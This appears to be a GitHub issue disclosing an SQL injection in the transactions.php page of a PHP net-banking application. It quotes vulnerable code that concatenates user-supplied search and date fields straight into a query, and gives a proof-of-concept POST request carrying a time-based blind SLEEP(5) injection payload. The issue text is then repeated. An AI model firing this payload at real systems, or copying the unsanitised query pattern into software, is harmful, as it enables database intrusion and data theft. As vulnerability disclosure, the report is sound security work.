You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
net-banking/transactions.php from line 28,The $_POST['search_term'] parameter is controllable, the parameter search_term can be passed through post, and the $_POST['search_term'] is not protected from sql injection, line 170 $result = $conn->query($sql0); made a sql query,resulting in sql injection
......
......
......
if (isset($_POST['search_term'])) {
$_SESSION['search_term'] = $_POST['search_term'];
}
if (isset($_POST['date_from'])) {
$_SESSION['date_from'] = $_POST['date_from'];
}
if (isset($_POST['date_to'])) {
$_SESSION['date_to'] = $_POST['date_to'];
}
// Filter indicator variable$filter_indicator = "None";
// Queries when search is setif (!empty($_SESSION['search_term'])) {
$sql0 .= " WHERE remarks COLLATE latin1_GENERAL_CI LIKE '%".$_SESSION['search_term']."%'";
$filter_indicator = "Remarks";
if (!empty($_SESSION['date_from']) && empty($_SESSION['date_to'])) {
$sql0 .= " AND trans_date > '".$_SESSION['date_from']." 00:00:00'";
$filter_indicator = "Remarks & Date From";
}
if (empty($_SESSION['date_from']) && !empty($_SESSION['date_to'])) {
$sql0 .= " AND trans_date < '".$_SESSION['date_to']." 23:59:59'";
$filter_indicator = "Remarks & Date To";
}
if (!empty($_SESSION['date_from']) && !empty($_SESSION['date_to'])) {
$sql0 .= " AND trans_date BETWEEN '".$_SESSION['date_from']." 00:00:00' AND '".$_SESSION['date_to']." 23:59:59'";
$filter_indicator = "Remarks, Date From & Date To";
}
}
// Queries when search is not setif (empty($_SESSION['search_term'])) {
if (!empty($_SESSION['date_from']) && empty($_SESSION['date_to'])) {
$sql0 .= " WHERE trans_date > '".$_SESSION['date_from']." 00:00:00'";
$filter_indicator = "Date From";
}
if (empty($_SESSION['date_from']) && !empty($_SESSION['date_to'])) {
$sql0 .= " WHERE trans_date < '".$_SESSION['date_to']." 23:59:59'";
$filter_indicator = "Date To";
}
if (!empty($_SESSION['date_from']) && !empty($_SESSION['date_to'])) {
$sql0 .= " WHERE trans_date BETWEEN '".$_SESSION['date_from']." 00:00:00' AND '".$_SESSION['date_to']." 23:59:59'";
$filter_indicator = "Date From & Date To";
}
}
......
......
......
<?php$result = $conn->query($sql0);
......
......
......
POC
POST /net-banking/transactions.php?cust_id=1 HTTP/1.1Host: www.bank.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 12search_term=' AND (SELECT 5964 FROM (SELECT(SLEEP(5)))doHk)-- TErm
Attack results pictures
The text was updated successfully, but these errors were encountered:
Vulnerability file address
net-banking/transactions.php
from line 28,The$_POST['search_term']
parameter is controllable, the parameter search_term can be passed through post, and the$_POST['search_term']
is not protected from sql injection, line 170$result = $conn->query($sql0);
made a sql query,resulting in sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: